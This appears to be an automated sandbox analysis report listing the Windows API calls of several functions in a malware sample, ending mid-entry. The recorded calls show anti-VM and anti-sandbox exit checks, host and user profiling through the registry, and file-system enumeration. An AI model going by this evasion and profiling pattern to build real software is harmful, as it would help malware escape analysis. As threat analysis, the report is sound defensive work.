                                                                                                • Instruction ID: 798b8003b846a09b6b7b20e33334a9dbf0f3b1503011c00658a7b4d9c0c3a9bc
                                                                                                • Opcode Fuzzy Hash: 3cba495796730e71670c0198b1c3556984460aa715bb36b7f53b4f9760dbd593
                                                                                                • Instruction Fuzzy Hash: DCA176717001089FCB18EF65D996FED7776AF94304F10812EE40A5F391EB349A49CB9A
                                                                                                APIs
                                                                                                • lstrcatA.KERNEL32(?,00975FC0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00414A2B
                                                                                                  • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                • lstrcatA.KERNEL32(?,00000000), ref: 00414A51
                                                                                                • lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                                                                • lstrcatA.KERNEL32(?,?), ref: 00414A84
                                                                                                • lstrcatA.KERNEL32(?,0096EAA0), ref: 00414A97
                                                                                                • lstrcatA.KERNEL32(?,?), ref: 00414AAB
                                                                                                • lstrcatA.KERNEL32(?,009744E0), ref: 00414ABF
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                                                                                  • Part of subcall function 004147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                                                                                  • Part of subcall function 004147C0: HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                                                                                  • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147F6
                                                                                                  • Part of subcall function 004147C0: FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 167551676-0
                                                                                                • Opcode ID: 287b75548e42ac9bba5700b012afc14cf6db2ae93f5d05c923625ed8275abeeb
                                                                                                • Instruction ID: a5c2d428b28de13255d2ac7946ab4b1842291e6be0275f36c7222d1bbee1b90f
                                                                                                • Opcode Fuzzy Hash: 287b75548e42ac9bba5700b012afc14cf6db2ae93f5d05c923625ed8275abeeb
                                                                                                • Instruction Fuzzy Hash: F93160B2D0421867CB14FBB0DC95EDD733EAB48704F40458EB20596091EE78A7C8CB99
                                                                                                APIs
                                                                                                  • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CC00), ref: 00419BF1
                                                                                                  • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CAB0), ref: 00419C0A
                                                                                                  • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096C918), ref: 00419C22
                                                                                                  • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CB70), ref: 00419C3A
                                                                                                  • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CB28), ref: 00419C53
                                                                                                  • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00967280), ref: 00419C6B
                                                                                                  • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00966930), ref: 00419C83
                                                                                                  • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00966630), ref: 00419C9C
                                                                                                  • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096C948), ref: 00419CB4
                                                                                                  • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CBA0), ref: 00419CCC
                                                                                                  • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CAC8), ref: 00419CE5
                                                                                                  • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CAE0), ref: 00419CFD
                                                                                                  • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00966950), ref: 00419D15
                                                                                                  • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,0096CB10), ref: 00419D2E
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                                                                  • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                                                                                  • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                                                                  • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                                                                                  • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                                                                                  • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                                                                  • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                                  • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                                                                  • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                                                                  • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                                                                  • Part of subcall function 00416A10: GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14
                                                                                                • GetUserDefaultLCID.KERNEL32 ref: 00416CC6
                                                                                                  • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                                                                  • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                                                                                  • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                                                                  • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                                                                                  • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                                                                  • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                                                                  • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0096C238,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                                                                                • Sleep.KERNEL32(00001770), ref: 00416DA4
                                                                                                • CloseHandle.KERNEL32(?,00000000,?,0096C238,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                                                                                • ExitProcess.KERNEL32 ref: 00416DC2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3511611419-0
                                                                                                • Opcode ID: 9fced759540180fd7acdc198eac4cfb2cc9391b0ca0e7afce8ef1ee0daef0713
                                                                                                • Instruction ID: 27cf1f4c78a26a12fad1801110170cb785a0876a7ac7b1f74ab5ff3c6832b849
                                                                                                • Opcode Fuzzy Hash: 9fced759540180fd7acdc198eac4cfb2cc9391b0ca0e7afce8ef1ee0daef0713
                                                                                                • Instruction Fuzzy Hash: CB315E30A05104ABCB04FBF1EC56BEE7379AF44314F50492FF11266196EF786A85C66E
                                                                                                APIs
                                                                                                • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                                                                                • wsprintfA.USER32 ref: 004185E9
                                                                                                • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                • RegQueryValueExA.KERNEL32(00000000,00974038,00000000,000F003F,?,00000400), ref: 0041867C
                                                                                                • lstrlenA.KERNEL32(?), ref: 00418691
                                                                                                • RegQueryValueExA.KERNEL32(00000000,00973E40,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B3C), ref: 00418729
                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 00418798
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004187AA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                • String ID: %s\%s
                                                                                                • API String ID: 3896182533-4073750446
                                                                                                • Opcode ID: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                                                                                • Instruction ID: 130e8712b2d17d0f4a3aa70f9b32a38deb323cc32c4c6a80807e33934adfa5f1
                                                                                                • Opcode Fuzzy Hash: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                                                                                • Instruction Fuzzy Hash: 0F211B71A112189BDB24DB54DC85FE9B3B9FB48704F1081D9E609A6180DF746AC5CF98
                                                                                                APIs
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ??2@$CrackInternetlstrlen
                                                                                                • String ID: <
                                                                                                • API String ID: 1683549937-4251816714
                                                                                                • Opcode ID: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
                                                                                                • Instruction ID: 160db8237089610cf3963e488d7c28046b69bb3d6c402c1973a99714a059ae02
                                                                                                • Opcode Fuzzy Hash: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
                                                                                                • Instruction Fuzzy Hash: 9F2149B1D00219ABDF14DFA5EC4AADD7B75FF04320F008229F925A7290EB706A19CF95
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0041783B
                                                                                                • RegOpenKeyExA.KERNEL32(80000002,0096E558,00000000,00020119,00000000), ref: 0041786D
                                                                                                • RegQueryValueExA.KERNEL32(00000000,00974068,00000000,00000000,?,000000FF), ref: 0041788E
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00417898
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                • String ID: Windows 11
                                                                                                • API String ID: 3466090806-2517555085
                                                                                                • Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                                                                                • Instruction ID: 90abcce2ecfc2a5b8cd512a74185dd25ab23219ddadcc09848e79f4871c60c5e
                                                                                                • Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                                                                                • Instruction Fuzzy Hash: FD01A274E09304BBEB00DBE4ED49FAE7779EF48700F00419AFA04A7290E7749A40CB55
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178C4
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004178CB
                                                                                                • RegOpenKeyExA.KERNEL32(80000002,0096E558,00000000,00020119,00417849), ref: 004178EB
                                                                                                • RegQueryValueExA.KERNEL32(00417849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041790A
                                                                                                • RegCloseKey.ADVAPI32(00417849), ref: 00417914
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                • String ID: CurrentBuildNumber
                                                                                                • API String ID: 3466090806-1022791448
                                                                                                • Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                                                                                • Instruction ID: 4c9302de3449b24d107dc6acc84b9b99571be3b3dcaa7f8b3677a924de38e7e6
                                                                                                • Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                                                                                • Instruction Fuzzy Hash: 51014FB5E45309BBEB00DBE4DC4AFAEB779EF44700F10459AF605A6281E774AA408B91
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 00414325
                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00974680,00000000,00020119,?), ref: 00414344
                                                                                                • RegQueryValueExA.ADVAPI32(?,00976050,00000000,00000000,00000000,000000FF), ref: 00414368
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00414372
                                                                                                • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414397
                                                                                                • lstrcatA.KERNEL32(?,00976080), ref: 004143AB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                • String ID:
                                                                                                • API String ID: 2623679115-0
                                                                                                • Opcode ID: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
                                                                                                • Instruction ID: 95163f332e2e8486d22fa14c8026e7b1b291c890fe90cbe7f90fb3e747a5c624
                                                                                                • Opcode Fuzzy Hash: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
                                                                                                • Instruction Fuzzy Hash: B641B8B6D001086BDB14EBA0EC46FEE773DAB8C300F04855EB7155A1C1EA7557888BE1
                                                                                                APIs
                                                                                                • strtok_s.MSVCRT ref: 004137D8
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                • strtok_s.MSVCRT ref: 00413921
                                                                                                  • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0096C238,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                  • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpystrtok_s$lstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3184129880-0
                                                                                                • Opcode ID: 6c6fb7d06333238994955fa4e9c6fc16004326b07765d99504ffdab069fb4719
                                                                                                • Instruction ID: b6ea97cb77591b20574b5f8bad6a91ea9d9e82a59cceccb6aeafc47a8efa6348
